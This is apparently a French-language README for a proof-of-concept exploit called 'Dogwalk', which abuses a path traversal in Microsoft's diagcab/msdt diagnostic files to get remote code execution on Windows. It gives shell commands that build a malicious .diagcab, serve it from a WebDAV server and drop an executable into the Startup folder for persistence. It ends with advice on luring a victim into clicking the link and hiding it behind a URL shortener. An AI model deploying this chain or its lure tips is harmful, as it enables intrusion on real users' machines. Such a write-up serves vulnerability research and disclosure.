
🐾Dogwalk PoC (en utilisant un fichier diagcab pour obtenir une RCE sur Windows)
Concept clé : vulnérabilité de traversée de chemin dans la technologie Diagcab de Microsoft (msdt) qui pourrait mener à une exécution de code à distance.
Vous pouvez trouver l'avis complet dans le billet de blog
La vulnérabilité a été signalée depuis 2 ans (par @irsl) et n'a toujours pas de correctif !
La preuve de concept met en place un serveur webdav hébergeant un fichier .diagcab malveillant qui effectuera une traversée de chemin pour écrire un exécutable malveillant dans C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. Le fait d'écrire un exécutable dans ce dossier entraînera son exécution à chaque démarrage de la machine Windows par l'utilisateur ; cela s'appelle Boot Logon Autostart Execution.
Donc, en gros, ce qu'il nous faut :
.diagcab malveillant.diagcab(💡 utilisez l'en-tête de réponse Content-type: application/octet-stream pour que le navigateur télécharge automatiquement le fichier lors de la navigation vers l'URL)
Si vous êtes trop paresseux (ou pressé) pour procéder étape par étape :
./hurry-dogwalk.sh [WEBDAV_URL] # need docker
# Stop the server
./hurry-dogwalk.sh --clean
Sinon ↓↓
.diagcab.diagcfg sont de simples fichiers XML qui contiennent une référence à un ou plusieurs packages de diagnostic et fournissent des métadonnées à leur sujet..diagcab.Construisez d'abord custom.diagcfg :
./build-malicious-diagcfg.sh --url [WEBDAV_URL]
Et construisez le hotfix895214.diagcab :
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe
Enfin, déplacez-le dans le répertoire ./webdav/diagcab-webdav-poc/config
Placez l'exécutable que vous souhaitez transférer sur la machine victime dans le répertoire ./webdav/malicious... (Ici, nous utilisons le classique calc.exe)
...Et lancez le serveur :
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl
Le fichier .diagcab malveillant est disponible à l'adresse https://[WEBDAV_URL]/config/hotfix895214.diagcab. Vous devez maintenant attirer une victime pour qu'elle clique sur ce lien.
(💡vous pouvez utiliser un raccourcisseur d'URL pour que cela paraisse moins suspect)
🐾🐾
